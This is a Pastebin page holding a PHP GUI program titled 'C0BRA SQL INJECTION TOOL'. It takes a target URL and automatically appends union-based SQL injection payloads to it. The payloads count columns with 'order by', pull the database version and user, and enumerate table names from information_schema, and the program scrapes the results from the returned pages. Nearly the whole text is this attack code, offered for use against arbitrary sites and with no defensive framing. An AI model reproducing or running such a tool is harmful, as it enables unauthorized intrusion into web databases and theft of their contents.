API tools faq
paste
Guest User

Untitled

a guest
Apr 24th, 2018
104
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 10.49 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2.  
  3. if (!class_exists('gtk')) {
  4. die("Please load the php-gtk2 module in your php.ini\r\n");
  5. }
  6. function on_interactive_dialog_clicked($aTxtBoxA,$aTxtBoxB)
  7. {
  8. $target = $aTxtBoxA->get_text();
  9. $scannerObject = new scanner($target);
  10. $table = $scannerObject->returnTables();
  11. foreach ($table as $value)
  12. {
  13.  
  14. $textBoxValue.= $value.",";
  15. }
  16. $aTxtBoxB->set_text($textBoxValue);
  17.  
  18. }
  19. $wnd = new GtkWindow();
  20. $wnd->set_title('C0BRA SQL INJECTION TOOL');
  21. $wnd->connect_simple('destroy', array('gtk', 'main_quit'));
  22. $lblCredit = new GtkLabel('Please Enter URI To Attack');
  23. $lblUsername = new GtkLabel('_Site Uri', true);
  24. $lblTables = new GtkLabel('_Tables', true);
  25.  
  26. $txtBoxA = new GtkEntry();
  27. $txtBoxB = new GtkEntry();
  28. $txtPassword = new GtkEntry();
  29. $btnAttack = new GtkButton('_Attack');
  30. $btnCancel = new GtkButton('_Quit');
  31. $btnCancel->connect_simple('clicked', array($wnd, 'destroy'));
  32. $btnAttack->connect_simple('clicked', 'on_interactive_dialog_clicked',$txtBoxA,$txtBoxB);
  33. $tbl = new GtkTable(4, 2);
  34. $tbl->attach($lblCredit, 0, 2, 0, 1);
  35. $tbl->attach($lblUsername, 0, 1, 1, 2);
  36. $tbl->attach($txtBoxA, 1, 2, 1, 2);
  37. $tbl->attach($txtBoxB, 0, 2, 2, 3);
  38. $bbox = new GtkHButtonBox();
  39. $bbox->set_layout(Gtk::BUTTONBOX_EDGE);
  40. $bbox->add($btnCancel);
  41. $bbox->add($btnAttack);
  42. $vbox = new GtkVBox();
  43. $vbox->pack_start($tbl);
  44. $vbox->pack_start($bbox);
  45. $wnd->add($vbox);
  46. $textBuffer = new GtkTextBuffer();
  47. $textView = new GtkTextView();
  48. $wnd->show_all();
  49. //Start the main loop
  50. Gtk::main();
  51. class scanner {
  52. protected $originalSiteToAttack;
  53. protected $siteStrln;
  54. function __construct($aSite = "")
  55. {
  56. $this->originalSiteToAttack = $aSite;
  57. $this->siteStrln = strlen($this->originalSiteToAttack);
  58. }
  59. private function numberOfRows()
  60. {
  61. $originalSiteToAttack = $this->originalSiteToAttack;
  62. $originalSiteToAttack.= "%20order%20by%201--";
  63. $defHtml = file_get_contents($originalSiteToAttack);
  64. for ($i=1;$i<5;$i++)
  65. {
  66. if ($i != 1)
  67. {
  68. $originalSiteToAttack = substr($originalSiteToAttack , 0, $this->siteStrln);
  69. $originalSiteToAttack = $originalSiteToAttack . "%20order%20by%20$i--";
  70. }
  71. $notDefHtml = file_get_contents($originalSiteToAttack);
  72. if (strlen($notDefHtml) != strlen($defHtml))
  73. {
  74. return --$i;
  75. }
  76. }
  77. }
  78. private function buildQuery($aOption,$aTable='')
  79. {
  80. $originalSiteToAttack = $this->originalSiteToAttack;
  81. $numberOfRows = 2;
  82. //$numberOfRows = $this->numberOfRowsVar;
  83. $fieldChar = substr($originalSiteToAttack, -1);
  84. $fieldChar = "-$fieldChar";
  85. $originalSiteToAttack = substr($originalSiteToAttack , 0, $this->siteStrln-1);
  86. $originalSiteToAttack.="$fieldChar";
  87. $originalSiteToAttack .= "%20union%20select%20";
  88. switch ($aOption)
  89. {
  90. case "version":
  91. for ($i=1;$i<=$numberOfRows;$i++)
  92. {
  93. if ($i==$numberOfRows)
  94. {
  95. $originalSiteToAttack.= "@@version%20";
  96. break;
  97. }
  98. //the hex code king
  99. $originalSiteToAttack.= "@@version%20,";
  100. }
  101. $originalSiteToAttack.="--";
  102. return $originalSiteToAttack;
  103. break;
  104. case "vulnurbilityfield":
  105. for ($i=1;$i<=$numberOfRows;$i++)
  106. {
  107. if ($i==$numberOfRows)
  108. {
  109. $originalSiteToAttack.= "CHAR(0x6775797468656b696e67)";
  110. break;
  111. }
  112. //the hex code king
  113. $originalSiteToAttack.= "CHAR(0x6775797468656b696e67),";
  114. }
  115. $originalSiteToAttack.="--";
  116. return $originalSiteToAttack;
  117. break;
  118. case "dbuser":
  119. for ($i=1;$i<=$numberOfRows;$i++)
  120. {
  121. if ($i==$numberOfRows)
  122. {
  123. $originalSiteToAttack.= "user()";
  124. break;
  125. }
  126. //the hex code king
  127. $originalSiteToAttack.= "user(),";
  128. }
  129. $originalSiteToAttack.="--";
  130. return $originalSiteToAttack;
  131. break;
  132. case "numberoftables":
  133. for ($i=1;$i<=$numberOfRows;$i++)
  134. {
  135. if ($i==$numberOfRows)
  136. {
  137. $originalSiteToAttack.= "COUNT(*)";
  138. break;
  139. }
  140. //the hex code king
  141. $originalSiteToAttack.= "COUNT(*),";
  142. }
  143. $originalSiteToAttack.="%20from%20information_schema.tables--";
  144. return $originalSiteToAttack;
  145. break;
  146. case "tables":
  147. for ($i=1;$i<=$numberOfRows;$i++)
  148. {
  149. if ($i==$numberOfRows)
  150. {
  151. $originalSiteToAttack.= "table_name";
  152. break;
  153. }
  154. //the hex code king
  155. $originalSiteToAttack.= "table_name,";
  156. }
  157. $originalSiteToAttack.="%20from%20information_schema.tables%20limit%20$aTable,1--";
  158. return $originalSiteToAttack;
  159. break;
  160. }
  161. }
  162. private function numberOfTables()
  163. {
  164. $originalSiteToAttack = $this->buildQuery("numberoftables");
  165. $defHtml = file_get_contents($originalSiteToAttack);
  166. $relPosition = $this->locateVulnFieldPos();
  167. return substr($defHtml,$relPosition,10); //echo $originalSiteToAttack;
  168. }
  169. private function versionNumber()
  170. {
  171. $originalSiteToAttack = $this->buildQuery("version");
  172. $defHtml = file_get_contents($originalSiteToAttack);
  173. $relPosition = $this->locateVulnFieldPos();
  174. return substr($defHtml,$relPosition,10); //echo $originalSiteToAttack;
  175.  
  176. }
  177. private function dbUser()
  178. {
  179. $originalSiteToAttack = $this->buildQuery("dbuser");
  180. $defHtml = file_get_contents($originalSiteToAttack);
  181. $relPosition = $this->locateVulnFieldPos();
  182. return substr($defHtml,$relPosition,10); //echo $originalSiteToAttack;
  183. }
  184. private function locateVulnFieldPos()
  185. {
  186. $originalSiteToAttack = $this->buildQuery("vulnurbilityfield");
  187. $defHtml = file_get_contents($originalSiteToAttack);
  188. $pos = strpos($defHtml, "king");
  189. return $pos;
  190. }
  191. public function returnTables()
  192. {
  193. $numberOfTables = $this->numberOfTables();
  194. for ($i=0;$i<=4;$i++)
  195. {
  196. $originalSiteToAttack = $this->buildQuery("tables",$i);
  197. echo $originalSiteToAttack."\n";
  198. $defHtml = file_get_contents($originalSiteToAttack);
  199. $relPosition = $this->locateVulnFieldPos();
  200. $arrayToReturn[$i] = substr($defHtml,$relPosition,10); //echo $originalSiteToAttack;
  201. }
  202. return ($arrayToReturn);
  203. }
  204. private function findVulnField()
  205. {
  206. $originalSiteToAttack = $this->originalSiteToAttack;
  207. $originalSiteToAttack .= "%20union%20select%20";
  208. $siteStrln = $this->siteStrln;
  209. $pattern = '/&.*/';
  210. preg_match($pattern, $originalSiteToAttack, $matches);
  211. $explodedGets = explode("&",$matches[0]);
  212. //$numberOfRows = $this->getNumberOfRows();
  213. $numberOfRows = 2;
  214. for ($i=1;$i<count($explodedGets);$i++)
  215. {
  216. $pos = strpos($explodedGets[$i], "=");
  217. $pos++;
  218. $strCutedA = substr($explodedGets[$i], 0, $pos);
  219. $strCutedB = substr($explodedGets[$i], $pos, strlen($explodedGets[$i]));
  220. $strCutedB = preg_replace('/%.*/', "", $strCutedB);
  221. $explodedGetsB[$i] = $strCutedA."-".$strCutedB;
  222. }
  223.  
  224. for ($i=1;$i<=count($explodedGetsB);$i++)
  225. {
  226. echo "$$$$$$$".$i."\n";
  227. $originalSiteToAttack = str_replace($explodedGets[$i],$explodedGetsB[$i],$originalSiteToAttack);
  228. for ($j=1;$j<=$numberOfRows;$j++)
  229. {
  230. if ($j==$numberOfRows)
  231. {
  232. $originalSiteToAttack.= "CHAR(0x6775797468656b696e67)";
  233. //break;
  234. }
  235. //the hex code king
  236. $originalSiteToAttack.= "CHAR(0x6775797468656b696e67),";
  237. }
  238. $originalSiteToAttack.="--";
  239. echo $originalSiteToAttack."\n";
  240. //$defHtml = file_get_contents($originalSiteToAttack);
  241. //$pos = strrpos($defHtml,"king");
  242. //echo $pos;
  243. }
  244. }
  245. public function getVulbField()
  246. {
  247. $this->vulnField = $this->findVulnField();
  248. return $this->vulnField;
  249. }
  250.  
  251. public function getVersionNumber()
  252. {
  253. $this->dbVersion = $this->versionNumber();
  254. return $this->dbVersion ;
  255. }
  256.  
  257. private function getNumberOfRows()
  258. {
  259. $this->numberOfRowsVar = $this->numberOfRows();
  260. return $this->numberOfRowsVar."\n";
  261. }
  262. public function getUser()
  263. {
  264. $this->dbUserField = $this->dbUser();
  265. return $this->dbUserField;
  266. }
  267. private function getNumberOfTables()
  268. {
  269. $this->numberTables = $this->numberOfTables();
  270. return $this->numberTables;
  271. }
  272. private function getTables()
  273. {
  274. $numberOfTables = $this->getNumberOfTables();
  275. }
  276. public function __toString()
  277. {
  278. return $this->originalSiteToAttack;
  279. }
  280.  
  281. }
  282.  
  283. $arguments = getopt("t:d:");
  284. $target = $arguments["t"];
  285. $db = $arguments["d"];
  286. //$scannerObject = new scanner($target);
  287. //echo $scannerObject->getVersionNumber();
  288. //echo $scannerObject->getUser();
  289. //echo $scannerObject->returnTables();
  290. //echo $scannerObject->getVulbField();
  291. //for ($i=0; $i<strlen($string); $i++) {
  292. // echo $string[$i];
  293. //}
  294.  
  295.  
  296. ?>
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!